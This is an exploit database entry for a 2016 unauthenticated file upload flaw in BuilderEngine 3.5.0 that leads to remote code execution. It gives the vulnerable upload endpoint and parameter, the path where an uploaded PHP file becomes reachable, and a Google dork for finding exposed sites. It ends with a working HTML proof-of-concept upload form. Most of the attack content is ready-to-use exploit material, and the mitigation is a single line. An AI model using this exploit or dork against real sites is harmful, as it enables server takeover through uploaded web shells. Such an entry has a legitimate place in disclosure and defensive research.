BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0

vendor:

BuilderEngine

by:

metanubix

7,5

CVSS

HIGH

Unauthenticated Unrestricted File Upload

434

CWE

Product Name: BuilderEngine

Affected Version From: 3.5.0

Affected Version To: 3.5.0

Patch Exists: NO

Related CWE: N/A

CPE: a:builderengine:builderengine:3.5.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Kali Linux 2.0 64 bit

2016

BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0

A vulnerability exists in BuilderEngine 3.5.0 which allows an unauthenticated attacker to upload arbitrary files to the server. This can be exploited by sending a POST request to /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ with a malicious file in the files[] parameter. The uploaded file can then be accessed via the /files/ directory.

Mitigation:

Ensure that all file uploads are properly validated and sanitized before being accepted by the server.

Source

Exploit-DB raw data:

<!-- 
# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
# Date: 18/09/2016
# Exploit Author: metanubix
# Vendor Homepage: http://builderengine.org/
# Software Link: http://builderengine.org/page-cms-download.html
# Version: 3.5.0
# Tested on: Kali Linux 2.0 64 bit
# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"

1) Unauthenticated Unrestricted File Upload:

	POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/

	Vulnerable Parameter: files[]

	We can upload test.php and reach the file via the following link:
	/files/test.php
-->
<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
	<input type="file" name="files[]" />
	<input type="submit" value="send" />
</form>
</body>
</html>